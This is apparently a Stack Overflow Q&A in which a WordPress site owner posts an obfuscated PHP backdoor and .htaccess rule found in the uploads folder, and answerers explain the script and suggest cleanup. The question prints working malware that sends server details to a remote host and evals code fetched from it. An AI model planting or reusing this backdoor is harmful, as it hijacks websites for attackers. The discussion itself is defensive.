# What is this script doing (found in Wordpress uploads folder)

Tags: php, wordpress, security

I have found this script scattered around my Wordpress uploads folder on my shared host. I don't know how it got there, I have always been using the latest versions of Wordpress and all my plugins.

The script has been scattered into all possible sub-folders within my uploads folder, with a helper .htaccess file, to direct traffic to this script. It is only found inside the uploads folder, no files outside it.

Can you help me decode **what this script was doing** and **how could I recover from it** if it did anything bad?

Here is the helper .htaccess file,

```
Options -MultiViews
ErrorDocument 404 //wp-content/uploads/54580.php
```

And here is the main script (or in [pastebin](http://pastebin.com/ZUNxTphc)),

```
error_reporting(0);
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);
$f = base64_decode("cnNzbmV3cy53cw==");
if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "ceaa2f454d1892ee1d5c3f777e07144d") $f = $_REQUEST["id"];
if ($c = file_get_contents(base64_decode("aHR0cDovLzdhZHMu") . $f . $z)) eval($c); 
else if ($c = file_get_contents(base64_decode("aHR0cDovLzcu") . $f . $z)) eval($c); 
else {
    $cu = curl_init(base64_decode("aHR0cDovLzcxLg==") . $f . $z);
    curl_setopt($cu, CURLOPT_RETURNTRANSFER, 1);
    $o = curl_exec($cu);
    curl_close($cu);
    eval($o);
}
;
die();
```

Answer (score 6, accepted):

First, it turns off error reporting, making sure that if something goes wrong, nobody will see the error message.

then, it seems to download a file from another server.

The IP address of that server has been obfuscated by jumbling it a bit, and base64encoding the fragments.
The complex spaghetti-code of if-statements reassembles it into a (probably) valid server IP address.

If it can download that file, it will eval() it, meaning that it will interpret it as PHP, and run it.

Answer (score 5):

> Can you help me decode what this script was doing

It loads a payload from some other server and executes it.

> and how could I recover from it if it did anything bad?

Remove the script. Restore the backup of your site that was not tainted. Get in contact with someone experienced with such problems and get a review of your site and better directions for the future.

Comment: Great answer, one addendum : Do not forget to change your FTP password for good measure! (upvoted)

Comment: And update your wordpress! http://www.cvedetails.com/product/4096/Wordpress-Wordpress.html?vendor_id=2337 (26 Arbitrary Code Execution vuls and 16
 Sql Injections) Update modules too - they are worse for vuls! Remove any modules you don't use. Get a security review of any modules you wrote yourself. Review your users and their auth-levels and reset their wordpress passwords. Review  all the content of posts,  templates and comments.

Comment: As has been hinted at here but not clearly stated, this file is a SYMPTOM that your website has been hacked - not the cause. Wordpress has a history of vulnerabilities - but it also provides a mechanism for supporting plug-ins - naby of which are not as well maintained as they might be.

Comment: @symcbean: Good point about the symptom (and not the cause). But whom to blame? WP and plugins ship under GPL with a no warranty clause.

Comment: The point I was trying to make is that zsero will not get him/herself out of this current hole by deleting the file / restoring from backup - but making the server secure enough to prevent the same exploit in future will be a big job.

Comment: Sure, that needs some expert advice, that's why I put that into the answer.

Comment: @Hakre - great answer, but regarding your comment - I do not thing anyone should or could be blamed. even if wordpress had a different liscense  - blaming it for hacks would be like blaming GM every time your car get´s stolen ..

Comment: @ObmerkNinenine: Better ask your lawyers, with software it's a *little* bit different compared to GM and it's cars.

Answer (score 1):

It's calling a remote url, maybe for sendin information.
7ads.rssnews.com or 7.rssnews.com

I think, that you should delete this file from your webserver, it does not seem to be secure.

Answer (score 0):

Delete this line from the .htacces in your root folder

```
ErrorDocument 404 //wp-content/uploads/54580.php
```

Delete all files with the name 54580.php

Give write public permissions only on wp-content/uploads

Give read permissions for public for the rest.

What it does now ... It is sending some information to rssnews(dot)ws

Comment: actually to 7.rssnews(dot)ws or 7ads.rssnews(dot)ws

Answer (score 0):

Also take a look at which plugins have the ability to upload files into the uploads directory. There is a file on there somewhere that is being used to upload files, and just because all your plugins are up to date, does not mean that they are being utilized by attackers.

Some plugin coders have not kept their plugins up to date even though exploits have been discovered in them. Some plugins are being exploited at the moment for which no exploit has been made public, and there are also a couple of issues that Wordpress themselves have deemed not bad enough to fix.
Example: http://goo.gl/EfMTJ

Also if you have been hacked before, you may have missed a shell code (backdoor file) which could also still be resident in your web folders. The reason uploads is being used is probably for two reasons, one is that it is probably writable by the webserver, and two is that it is the common folder which plugins and the main site uses to upload files to.